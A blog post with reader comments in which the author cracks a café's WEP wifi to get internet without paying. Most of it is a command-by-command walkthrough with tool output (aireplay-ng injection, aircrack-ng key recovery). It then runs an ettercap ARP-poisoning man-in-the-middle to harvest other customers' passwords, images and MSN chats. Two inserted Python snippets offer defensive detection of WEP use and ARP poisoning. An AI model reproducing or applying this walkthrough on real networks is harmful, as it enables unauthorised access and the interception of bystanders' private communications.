Coffee Binary Wifi
Hello guys … today I went to Coffee Beanery with my laptop indeed.
I searched for wireless networks and the nearest one has an ESSID of “cblink”;
it's the Coffee Beanery link. Anyway, it has WEP encryption, WEP cipher,
so I went to the woman who works here and asked her for the password.
She said you have to pay!! I'm like why?? ^_^ So I just ordered a cold mocha
and didn't pay for the wireless and wanted to crack it .. free internet, free community
and free speech LOL..
So let's check it out..
$ iwlist wlan1 scanning
          Cell 01 - ...etc
          Cell 02 - Address: 00:12:17:A8:2B:F9
                    ESSID:"cblink"
                    Mode:Master
                    Channel:11
                    Frequency:2.462 GHz (Channel 11)
                    Quality=51/100  Signal level:-50 dBm
                    Encryption key:on
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              12 Mb/s; 24 Mb/s; 36 Mb/s; 9 Mb/s; 18 Mb/s
                              48 Mb/s; 54 Mb/s
                    Extra:tsf=000000371cde58ea
So our target ESSID is “cblink”, its access point is 00:12:17:A8:2B:F9,
and it's on channel 11 with WEP encryption.
So let's put our card in monitor mode using airmon-ng
$ airmon-ng start wlan1 11
and we got the monitor interface “mon0”.
Now let's run airodump-ng to capture everything
$ airodump-ng --bssid 00:12:17:A8:2B:F9 --channel 11 --write cblink mon0

 CH 11 ][ Elapsed: 9 mins ][ 2008-07-10 23:18

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:12:17:A8:2B:F9  206 100      349       90  279  11  54e. WEP  WEP    OPN  cblink

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe
 00:12:17:A8:2B:F9  00:15:70:35:8D:87  192  11-11     20     1167
 00:12:17:A8:2B:F9  00:A0:F8:EB:77:13  196  11-11     28     2175
And now let's do a fake authentication attack (-1) using aireplay-ng
$ aireplay-ng -1 0 -a 00:12:17:A8:2B:F9 mon0
and it will report that the attack succeeded.
Then let's do the standard ARP-request replay (-3)
$ aireplay-ng -3 -b 00:12:17:A8:2B:F9 -e cblink mon0
and wait a few seconds or minutes, depending on the wireless signal and other things.
Then you'll get something like
Read 585997 packets (got 367035 ARP requests and 187782 ACKs), sent 199637 packets...(499 pps)
Check out the airodump terminal, you'll see something like this
 CH 11 ][ Elapsed: 9 mins ][ 2008-07-10 23:18

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:12:17:A8:2B:F9  206 100     5349   189111  379  11  54e. WEP  WEP    OPN  cblink

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe
 00:12:17:A8:2B:F9  00:15:70:35:8D:87  192  11-11     20     1167
 00:12:17:A8:2B:F9  00:A0:F8:EB:77:13  196  11-11     28     2175
 00:12:17:A8:2B:F9  00:1C:F0:A0:94:A7    0   0- 0 582445   369975
Nice, so we captured a lot of data and IVs, and here's our STATION 00:1C:F0:A0:94:A7
after doing the fake authentication attack.
Mmmm so how about cracking the key?
$ ls
cblink-01.cap  cblink-01.txt  replay_arp-0710-230918.cap
Use aircrack-ng to crack cblink-01.cap and get the WEP key of our target
$ aircrack-ng cblink-01.cap
Opening cblink-01.cap
Read 753046 packets.

   #  BSSID              ESSID   Encryption

   1  00:12:17:A8:2B:F9  cblink  WEP (189111 IVs)

                  [00:00:00] Tested 877 keys (got 184718 IVs)

   KB    depth   byte(vote)
    0    0/ 13   5A(251392) 0C(209408) 92(205056) F4(204288) 64(200960) E8(200192) 5C(199424) 59(199168)
    1    0/  1   37(267520) D6(200704) 6F(199680) C8(198656) 06(197888) 18(197376) E4(197376) 50(196864)
    2   13/  2   10(197120) 46(196608) 03(196352) 09(196352) 58(196096) AF(195840) A0(195584) BF(195328)
    3    0/  1   9A(269056) D5(201984) 8F(199168) E3(198656) CE(198144) 18(197376) C6(197376) 46(196608)
    4   28/  4   21(194048) 01(193792) 6E(193792) A2(193792) AB(193792) CE(193792) F2(193536) 23(193280)

             KEY FOUND! [ 5A:CD:74:E6:09:13:90:60:0F:B8:40:CD:A3 ]
        Decrypted correctly: 100%
Nice, we cracked it successfully and the key is 5A:CD:74:E6:09:13:90:60:0F:B8:40:CD:A3
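The airodump-ng screens above are exactly what a defender's wireless audit sees, so here is an added example (not code from the original post): a Python parser for that table format that flags WEP networks and any station whose frame count dwarfs its peers, which is what the ARP-request replay looks like in the second screen. The sample screen is constructed from the post's output, and the 50× threshold is an assumption.

```python
import re
import statistics

MAC = r"(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}"
# AP rows: BSSID PWR RXQ Beacons #Data #/s CH MB ENC CIPHER AUTH [ESSID]
AP_ROW = re.compile(rf"^\s*({MAC})\s+(-?\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(\d+)"
                    rf"\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s*(.*?)\s*$")
# Station rows: BSSID STATION PWR Rate Lost Packets [Probe]; Rate may look like "0- 0"
STA_ROW = re.compile(rf"^\s*({MAC})\s+({MAC})\s+(-?\d+)\s+(\d+\s*-\s*\d+)\s+(\d+)\s+(\d+)")

def parse_snapshot(text):
    """Split one airodump-ng screen into {bssid: ap_info} and a list of station rows."""
    aps, stations = {}, []
    for line in text.splitlines():
        ap = AP_ROW.match(line)
        if ap:
            aps[ap[1].upper()] = {"data": int(ap[5]), "enc": ap[9], "auth": ap[11], "essid": ap[12]}
            continue
        sta = STA_ROW.match(line)
        if sta:
            stations.append({"bssid": sta[1].upper(), "sta": sta[2].upper(),
                             "lost": int(sta[5]), "packets": int(sta[6])})
    return aps, stations

def audit(text, inject_ratio=50):
    """Findings: WEP networks, and stations sending far more frames than their peers (assumed ratio)."""
    aps, stations = parse_snapshot(text)
    findings = []
    for bssid, ap in aps.items():
        if ap["enc"] == "WEP":
            findings.append(f"{bssid} ({ap['essid']}): WEP with {ap['data']} data frames (IVs) "
                            "captured; key recovery takes minutes, migrate to WPA2/WPA3")
    baseline = statistics.median(s["packets"] for s in stations) if stations else 0
    for s in stations:  # legit clients here send ~1-2k frames; an injecting station sends 100k+
        if baseline and s["packets"] > inject_ratio * baseline:
            findings.append(f"{s['sta']} on {s['bssid']}: {s['packets']} frames vs median "
                            f"{baseline:.0f}, lost={s['lost']}; consistent with frame injection/replay")
    return findings

# Constructed sample, modelled on the second airodump-ng screen in the post above.
SAMPLE = """\
 CH 11 ][ Elapsed: 9 mins ][ 2008-07-10 23:18

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:12:17:A8:2B:F9  206 100     5349   189111  379  11  54e. WEP  WEP    OPN  cblink

 BSSID              STATION            PWR   Rate   Lost  Packets  Probe
 00:12:17:A8:2B:F9  00:15:70:35:8D:87  192  11-11     20     1167
 00:12:17:A8:2B:F9  00:A0:F8:EB:77:13  196  11-11     28     2175
 00:12:17:A8:2B:F9  00:1C:F0:A0:94:A7    0   0- 0 582445   369975
"""
```

Running `audit(SAMPLE)` yields two findings, one for the WEP network and one for the station with 369975 frames; the same audit on the first screen (two stations only) yields just the WEP finding.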
Now let's connect to the wireless
$ airmon-ng stop mon0
$ airmon-ng stop wlan1
$ iwconfig wlan1 essid cblink channel 11 key 5A:CD:74:E6:09:13:90:60:0F:B8:40:CD:A3 ap 00:12:17:A8:2B:F9
$ iwconfig wlan1
wlan1     IEEE 802.11  ESSID:"cblink"
          Mode:Managed  Frequency:2.462 GHz  Access Point: 00:12:17:A8:2B:F9
          Bit Rate=1 Mb/s   Tx-Power=11 dBm
          Retry min limit:7   RTS thr:off   Fragment thr=2352 B
          Encryption key:5ACD-74E6-0913-9060-0FB8-40CD-A3
          Link Quality=71/100  Signal level:-52 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0
Nice ^___^ let's DHCP
$ dhclient3 wlan1
Internet Systems Consortium DHCP Client V3.0.6
Listening on LPF/wlan1/00:1c:f0:a0:94:a7
Sending on   LPF/wlan1/00:1c:f0:a0:94:a7
Sending on   Socket/fallback
DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 6
DHCPOFFER of 191.167.14.106 from 191.167.14.1
DHCPREQUEST of 191.167.14.106 on wlan1 to 255.255.255.255 port 67
DHCPACK of 191.167.14.106 from 191.167.14.1
bound to 191.167.14.106 -- renewal in 36615 seconds.
Connected, and the router gave us the IP 191.167.14.106.
Now let's sniff the network, we might find nice things using ettercap
$ ettercap -Tqi wlan1 -P autoadd -M arp:remote -L log.traffic -l log.info -m log.messages -w log.pcap -t all -k log.hosts // //
Start it and wait for things.. but before that make sure to turn off any firewall, e.g. Firestarter,
the GUI firewall application…
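The `-M arp:remote` step above is ARP cache poisoning, and on the network side it has a clear signature. An added example (not from the original post): a detector over ARP "is-at" replies that alerts when an IP, especially the gateway, suddenly answers from a different MAC, or when one MAC claims several IPs. The sample replies are constructed; the gateway and the second client's IP/MAC are hypothetical, the other addresses come from the post.

```python
from collections import defaultdict

def detect_arp_poisoning(replies, gateway_ip):
    """replies: iterable of (sender_ip, sender_mac) taken from ARP reply frames.
    Returns the list of alerts, one per IP-to-MAC change and one per multi-IP MAC."""
    ip_to_mac = {}                  # what each IP was last seen answering from
    mac_to_ips = defaultdict(set)   # every IP a given MAC has claimed
    flagged_macs, alerts = set(), []
    for ip, mac in replies:
        mac = mac.lower()
        known = ip_to_mac.setdefault(ip, mac)
        if known != mac:
            kind = "gateway" if ip == gateway_ip else "host"
            alerts.append(f"{kind} {ip}: MAC changed {known} -> {mac}")
            ip_to_mac[ip] = mac     # keep tracking so a flip-back is reported too
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1 and mac not in flagged_macs:
            flagged_macs.add(mac)   # report each impersonating MAC once
            alerts.append(f"{mac} claims multiple IPs: {sorted(mac_to_ips[mac])}")
    return alerts

# Constructed sample: normal traffic, then the "remote" poisoning of both sides.
GATEWAY = "191.167.14.1"
SAMPLE_REPLIES = [
    ("191.167.14.1",  "00:0c:29:aa:bb:cc"),   # hypothetical real gateway MAC
    ("191.167.14.50", "00:15:70:35:8d:87"),   # hypothetical client IP, MAC from the post
    ("191.167.14.1",  "00:1c:f0:a0:94:a7"),   # sniffing host now answers for the gateway
    ("191.167.14.50", "00:1c:f0:a0:94:a7"),   # ... and for the client
    ("191.167.14.1",  "00:1c:f0:a0:94:a7"),   # repeated poison, nothing new to report
]

if __name__ == "__main__":
    for alert in detect_arp_poisoning(SAMPLE_REPLIES, GATEWAY):
        print("ALERT:", alert)
```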
Mmmm that's it, now you can do lots of things:
you can do dns_spoof, which comes as a plugin for ettercap,
you can see passwords,
and images transferred over HTTP using driftnet
$ driftnet -i wlan1 -v -a -d /sniffing/cblink/images -p -s
You can dump the MSNMS protocol conversations from the log.pcap file made by ettercap
using a script called msndump.pl (search for it on Google),
or you can use imsniff
$ imsniff -i wlan1 -cd /sniffing/cblink/converstions -vvv -p
Mmmm just be creative and make whatever you want ^.^
And yes … if you want to sniff MSN users who use Windows and haven't connected yet,
don't do it that way… because the new version of the MSN client from Microsoft (MSN Live)
won't let them connect because of the SSL faking that ettercap does..
So just crack the wireless,
connect to it and use airtun-ng to make another interface with the WEP key
and start sniffing via that interface, e.g. at0..
That way you'll be sniffing that traffic without connecting to the wireless
and without doing SSL MITM or ARP or any other attacks like half-duplex MITM attacks …
which would prevent some programs from functioning….
bye
about 1 year ago
You're awesome! Keep up!!
about 1 year ago
Why do I get this output?
$ imsniff -i wlan0 -cd /****/**** -vvv -p
Wed May 27 15:52:00 2009 | 3 | Getting address and mask for device wlan0…
Wed May 27 15:52:00 2009 | 3 | OK
Wed May 27 15:52:00 2009 | 3 | Opening device…
Wed May 27 15:52:00 2009 | 0 | error [socket: Operation not permitted]
about 1 year ago
Pfff.. Don’t worry about it..
about 1 year ago
Thanks,
The problem you were having is because you don't have permission to sockets, you have to be “root” to use it.
about 1 year ago
Inspiring! =]
about 1 year ago
I think it's a great work & it certainly will make many realise how precious their love is.
about 11 months ago
cool pics
about 5 months ago
Very good site. Continue to keep the good work. I added the website. Thank you for excellent job!
about 4 months ago
me was here
hello dude
keep it up